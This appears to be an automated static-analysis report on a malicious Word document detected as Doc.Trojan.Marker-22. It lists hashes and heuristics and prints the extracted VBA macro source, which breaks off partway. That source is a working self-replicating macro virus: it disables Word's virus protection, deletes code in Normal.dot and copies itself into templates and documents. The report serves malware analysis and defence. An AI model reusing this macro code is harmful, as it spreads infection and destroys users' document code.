Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86b3a21b5122e017…

MALICIOUS

Office (OLE)

53.5 KB Created: 2001-03-02 18:18:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-10
MD5: 90855a502a585ee71f8ad920d2256da8 SHA-1: 0b0ff1740a2ea547d5a954908bd61c5e4b113ef1 SHA-256: 86b3a21b5122e017d68a087a9cc802bb914bc5e30e8ceecae4c2ef98b64220e7
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a Document_Open VBA macro. This macro attempts to write its own code to C:\Version.dat and then infect the Normal.dot template by deleting its existing modules and writing the malicious code. The ClamAV heuristic also flags an extracted artifact as Doc.Trojan.Marker-22, supporting the malicious nature.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 54,784 bytes but its declared streams total only 16,490 bytes — 38,294 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8158 bytes
SHA-256: 0e6e57fb0b8480e7c5935a2c4eccddb1bcce01d74adc5347908d1da7314638a0
Detection
ClamAV: Doc.Trojan.Marker-22
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

    On Error Resume Next
    
    Const Marker = "<- this is a new killer 2!"
    
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
    'Declare Variables
    Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Dim ad, nt As Object, iCount As Integer
    Dim OurCode, UserAddress, LogData, LogFile As String
    
    'Initialize Variables
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    
    DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    
    
    'Switch the VirusProtection ON
    Options.VirusProtection = False
    
    'write to file
    If DocumentInfected = True Then
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        iCount = NormalTemplate.VBProject.VBComponents.Count
        For i = 1 To iCount
            NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.CountOfLines
        Next i
        
 '       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
                                NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile "C:\Version.dat"
        NormalTemplate.Save
        
    End If
    
    If NormalTemplateInfected = True Then
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        iCount = NormalTemplate.VBProject.VBComponents.Count
        For i = 1 To iCount
            ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.CountOfLines
        Next i

        'ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
                                                    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile "C:\Version.dat"
        ActiveDocument.Save
    End If
End Sub

Private Sub Document_Close()

    On Error Resume Next
    
    Const Marker = "<- this is a new killer 2!"
    
    'Declare Variables
    Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Dim ad, nt As Object
    Dim OurCode, UserAddress, LogData, LogFile As String
    
    'Initialize Variables
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    
    DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    
    
    'Switch the VirusProtection ON
    Options.VirusProtection = False
    
    'write to file
    If DocumentInfected = True Then
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        iCount = No
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.